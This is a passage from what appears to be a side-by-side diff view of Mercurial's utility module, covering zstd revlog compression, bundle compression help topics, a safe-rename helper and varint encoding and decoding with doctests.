3839 return None
3839 return None
3840 else:
3840 else:
3841 z = self._cctx.compressobj()
3841 z = self._cctx.compressobj()
3842 chunks = []
3842 chunks = []
3843 pos = 0
3843 pos = 0
3844 while pos < insize:
3844 while pos < insize:
3845 pos2 = pos + self._compinsize
3845 pos2 = pos + self._compinsize
3846 chunk = z.compress(data[pos:pos2])
3846 chunk = z.compress(data[pos:pos2])
3847 if chunk:
3847 if chunk:
3848 chunks.append(chunk)
3848 chunks.append(chunk)
3849 pos = pos2
3849 pos = pos2
3850 chunks.append(z.flush())
3850 chunks.append(z.flush())
3851
3851
3852 if sum(map(len, chunks)) < insize:
3852 if sum(map(len, chunks)) < insize:
3853 return ''.join(chunks)
3853 return ''.join(chunks)
3854 return None
3854 return None
3855
3855
3856 def decompress(self, data):
3856 def decompress(self, data):
3857 insize = len(data)
3857 insize = len(data)
3858
3858
3859 try:
3859 try:
3860 # This was measured to be faster than other streaming
3860 # This was measured to be faster than other streaming
3861 # decompressors.
3861 # decompressors.
3862 dobj = self._dctx.decompressobj()
3862 dobj = self._dctx.decompressobj()
3863 chunks = []
3863 chunks = []
3864 pos = 0
3864 pos = 0
3865 while pos < insize:
3865 while pos < insize:
3866 pos2 = pos + self._decompinsize
3866 pos2 = pos + self._decompinsize
3867 chunk = dobj.decompress(data[pos:pos2])
3867 chunk = dobj.decompress(data[pos:pos2])
3868 if chunk:
3868 if chunk:
3869 chunks.append(chunk)
3869 chunks.append(chunk)
3870 pos = pos2
3870 pos = pos2
3871 # Frame should be exhausted, so no finish() API.
3871 # Frame should be exhausted, so no finish() API.
3872
3872
3873 return ''.join(chunks)
3873 return ''.join(chunks)
3874 except Exception as e:
3874 except Exception as e:
3875 raise error.StorageError(_('revlog decompress error: %s') %
3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 stringutil.forcebytestr(e))
3876 stringutil.forcebytestr(e))
3877
3877
3878 def revlogcompressor(self, opts=None):
3878 def revlogcompressor(self, opts=None):
3879 opts = opts or {}
3879 opts = opts or {}
3880 return self.zstdrevlogcompressor(self._module,
3880 return self.zstdrevlogcompressor(self._module,
3881 level=opts.get('level', 3))
3881 level=opts.get('level', 3))
3882
3882
3883 compengines.register(_zstdengine())
3883 compengines.register(_zstdengine())
3884
3884
3885 def bundlecompressiontopics():
3885 def bundlecompressiontopics():
3886 """Obtains a list of available bundle compressions for use in help."""
3886 """Obtains a list of available bundle compressions for use in help."""
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 items = {}
3888 items = {}
3889
3889
3890 # We need to format the docstring. So use a dummy object/type to hold it
3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 # rather than mutating the original.
3891 # rather than mutating the original.
3892 class docobject(object):
3892 class docobject(object):
3893 pass
3893 pass
3894
3894
3895 for name in compengines:
3895 for name in compengines:
3896 engine = compengines[name]
3896 engine = compengines[name]
3897
3897
3898 if not engine.available():
3898 if not engine.available():
3899 continue
3899 continue
3900
3900
3901 bt = engine.bundletype()
3901 bt = engine.bundletype()
3902 if not bt or not bt[0]:
3902 if not bt or not bt[0]:
3903 continue
3903 continue
3904
3904
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906
3906
3907 value = docobject()
3907 value = docobject()
3908 value.__doc__ = pycompat.sysstr(doc)
3908 value.__doc__ = pycompat.sysstr(doc)
3909 value._origdoc = engine.bundletype.__doc__
3909 value._origdoc = engine.bundletype.__doc__
3910 value._origfunc = engine.bundletype
3910 value._origfunc = engine.bundletype
3911
3911
3912 items[bt[0]] = value
3912 items[bt[0]] = value
3913
3913
3914 return items
3914 return items
3915
3915
3916 i18nfunctions = bundlecompressiontopics().values()
3916 i18nfunctions = bundlecompressiontopics().values()
3917
3917
3918 # convenient shortcut
3918 # convenient shortcut
3919 dst = debugstacktrace
3919 dst = debugstacktrace
3920
3920
3921 def safename(f, tag, ctx, others=None):
3921 def safename(f, tag, ctx, others=None):
3922 """
3922 """
3923 Generate a name that it is safe to rename f to in the given context.
3923 Generate a name that it is safe to rename f to in the given context.
3924
3924
3925 f: filename to rename
3925 f: filename to rename
3926 tag: a string tag that will be included in the new name
3926 tag: a string tag that will be included in the new name
3927 ctx: a context, in which the new name must not exist
3927 ctx: a context, in which the new name must not exist
3928 others: a set of other filenames that the new name must not be in
3928 others: a set of other filenames that the new name must not be in
3929
3929
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 in the provided context and is not in the set of other names.
3931 in the provided context and is not in the set of other names.
3932 """
3932 """
3933 if others is None:
3933 if others is None:
3934 others = set()
3934 others = set()
3935
3935
3936 fn = '%s~%s' % (f, tag)
3936 fn = '%s~%s' % (f, tag)
3937 if fn not in ctx and fn not in others:
3937 if fn not in ctx and fn not in others:
3938 return fn
3938 return fn
3939 for n in itertools.count(1):
3939 for n in itertools.count(1):
3940 fn = '%s~%s~%s' % (f, tag, n)
3940 fn = '%s~%s~%s' % (f, tag, n)
3941 if fn not in ctx and fn not in others:
3941 if fn not in ctx and fn not in others:
3942 return fn
3942 return fn
3943
3943
3944 def readexactly(stream, n):
3944 def readexactly(stream, n):
3945 '''read n bytes from stream.read and abort if less was available'''
3945 '''read n bytes from stream.read and abort if less was available'''
3946 s = stream.read(n)
3946 s = stream.read(n)
3947 if len(s) < n:
3947 if len(s) < n:
3948 raise error.Abort(_("stream ended unexpectedly"
3948 raise error.Abort(_("stream ended unexpectedly"
3949 " (got %d bytes, expected %d)")
3949 " (got %d bytes, expected %d)")
3950 % (len(s), n))
3950 % (len(s), n))
3951 return s
3951 return s
3952
3952
3953 def uvarintencode(value):
3953 def uvarintencode(value):
3954 """Encode an unsigned integer value to a varint.
3954 """Encode an unsigned integer value to a varint.
3955
3955
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 except the last has the most significant bit set. The lower 7 bits of
3957 except the last has the most significant bit set. The lower 7 bits of
3958 each byte store the 2's complement representation, least significant group
3958 each byte store the 2's complement representation, least significant group
3959 first.
3959 first.
3960
3960
3961 >>> uvarintencode(0)
3961 >>> uvarintencode(0)
3962 '\\x00'
3962 '\\x00'
3963 >>> uvarintencode(1)
3963 >>> uvarintencode(1)
3964 '\\x01'
3964 '\\x01'
3965 >>> uvarintencode(127)
3965 >>> uvarintencode(127)
3966 '\\x7f'
3966 '\\x7f'
3967 >>> uvarintencode(1337)
3967 >>> uvarintencode(1337)
3968 '\\xb9\\n'
3968 '\\xb9\\n'
3969 >>> uvarintencode(65536)
3969 >>> uvarintencode(65536)
3970 '\\x80\\x80\\x04'
3970 '\\x80\\x80\\x04'
3971 >>> uvarintencode(-1)
3971 >>> uvarintencode(-1)
3972 Traceback (most recent call last):
3972 Traceback (most recent call last):
3973 ...
3973 ...
3974 ProgrammingError: negative value for uvarint: -1
3974 ProgrammingError: negative value for uvarint: -1
3975 """
3975 """
3976 if value < 0:
3976 if value < 0:
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 % value)
3978 % value)
3979 bits = value & 0x7f
3979 bits = value & 0x7f
3980 value >>= 7
3980 value >>= 7
3981 bytes = []
3981 bytes = []
3982 while value:
3982 while value:
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 bits = value & 0x7f
3984 bits = value & 0x7f
3985 value >>= 7
3985 value >>= 7
3986 bytes.append(pycompat.bytechr(bits))
3986 bytes.append(pycompat.bytechr(bits))
3987
3987
3988 return ''.join(bytes)
3988 return ''.join(bytes)
3989
3989
3990 def uvarintdecodestream(fh):
3990 def uvarintdecodestream(fh):
3991 """Decode an unsigned variable length integer from a stream.
3991 """Decode an unsigned variable length integer from a stream.
3992
3992
3993 The passed argument is anything that has a ``.read(N)`` method.
3993 The passed argument is anything that has a ``.read(N)`` method.
3994
3994
3995 >>> try:
3995 >>> try:
3996 ... from StringIO import StringIO as BytesIO
3996 ... from StringIO import StringIO as BytesIO
3997 ... except ImportError:
3997 ... except ImportError:
3998 ... from io import BytesIO
3998 ... from io import BytesIO
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 0
4000 0
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 1
4002 1
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 127
4004 127
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 1337
4006 1337
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 65536
4008 65536
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 Traceback (most recent call last):
4010 Traceback (most recent call last):
4011 ...
4011 ...
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 """
4013 """
4014 result = 0
4014 result = 0
4015 shift = 0
4015 shift = 0
4016 while True:
4016 while True:
4017 byte = ord(readexactly(fh, 1))
4017 byte = ord(readexactly(fh, 1))
4018 result |= ((byte & 0x7f) << shift)
4018 result |= ((byte & 0x7f) << shift)
4019 if not (byte & 0x80):
4019 if not (byte & 0x80):
4020 return result
4020 return result
4021 shift += 7
4021 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now